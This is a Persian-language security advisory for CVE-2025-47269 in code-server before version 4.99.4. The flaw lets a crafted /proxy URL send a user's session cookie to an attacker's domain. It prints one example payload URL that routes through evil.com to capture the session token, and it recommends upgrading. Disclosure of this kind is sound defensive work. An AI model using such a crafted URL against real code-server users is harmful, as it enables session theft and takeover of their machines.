- شناسه CVE-2025-47269 :CVE
- CWE-441 :CWE
- yes :Advisory
- منتشر شده: می 9, 2025
- به روز شده: می 9, 2025
- امتیاز: 8.3
- نوع حمله: Unknown
- اثر گذاری: Unknown
- حوزه: برنامه نویسی
- برند: Coder
- محصول: code-server
- وضعیتPublished :CVE
- No :POC
- وضعیت آسیب پذیری: patch شده
چکیده
کد سرور (code-server) نسخهای از Visual Studio Code است که میتوان آن را روی هر ماشینی اجرا کرد و از طریق مرورگر به آن دسترسی داشت.
پیش از نسخه ۴.۹۹.۴، یک URL مخرب که بهطور خاص با استفاده از مسیر /proxy طراحی شده باشد، میتواند باعث شود که مهاجم به توکن نشست (session token) کاربر دسترسی پیدا کند.
دلیل اصلی این آسیبپذیری، اعتبارسنجی ناکافی پورتها در درخواستهای پراکسی (proxy) است. این باعث میشود که پراکسی به دامنه دلخواه مهاجم هدایت شود. برای مثال آدرس مخرب زیر:
https://<code-server>/proxy/test@evil.com/path
توضیحات
در واقع باعث میشود که کد سرور، درخواست را به آدرس test@evil.com/path پراکسی کند؛ جایی که مهاجم میتواند توکن نشست کاربر را استخراج کند.
هر کاربری که کد سرور را با پراکسی داخلی فعال اجرا کرده باشد و روی چنین لینکهایی کلیک کند، در معرض این حمله قرار میگیرد. معمولاً مسیر /proxy برای دسترسی به پورتهای محلی استفاده میشود، اما در این حالت، آدرس به دامنه مهاجم هدایت میشود و کوکیها (شامل توکن نشست) نیز در این درخواست ارسال میشوند.
مهاجم با در اختیار داشتن کوکی نشست، میتواند وارد محیط کد سرور شده و دسترسی کامل به ماشین قربانی را بهعنوان کاربری که کد سرور را اجرا کرده، بهدست آورد.
حمله از راه دور، بدون نیاز به احراز هویت قابل اجرا است. برای موفقیت حمله، لازم است کاربر روی لینک مخرب کلیک کند. همچنین اکسپلویت این آسیب پذیری ساده است.
این نوع آسیبپذیری با شناسه CWE-441 طبقهبندی میشود و میتواند بر روی محرمانگی (Confidentiality)، یکپارچگی (Integrity) و دسترسپذیری (Availability) تأثیر بگذارد.
این مشکل در نسخه ۴.۹۹.۴ برطرف شده است.
CVSS
Score | Severity | Version | Vector String |
8.3 | HIGH | 3.1 | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L |
لیست محصولات آسیب پذیر
Versions | Product |
affected at < 4.99.4 | code-server |
لیست محصولات بروز شده
Versions | Product |
4.99.4 | code-server |
نتیجه گیری
برای جلوگیری از نفوذ از نسخه بروزرسانی شده استفاده کنید.
منابع
- https://www.cve.org/CVERecord?id=CVE-2025-47269
- https://www.cvedetails.com/cve/CVE-2025-47269/
- https://github.com/coder/code-server/releases/tag/v4.99.4
- https://github.com/coder/code-server/commit/47d6d3ada5aadef6d221f3d612401eb3dad9299e
- https://vulmon.com/vulnerabilitydetails?qid=CVE-2025-47269
- https://vuldb.com/?id.308254
- https://nvd.nist.gov/vuln/detail/CVE-2025-47269
- https://cwe.mitre.org/data/definitions/441.html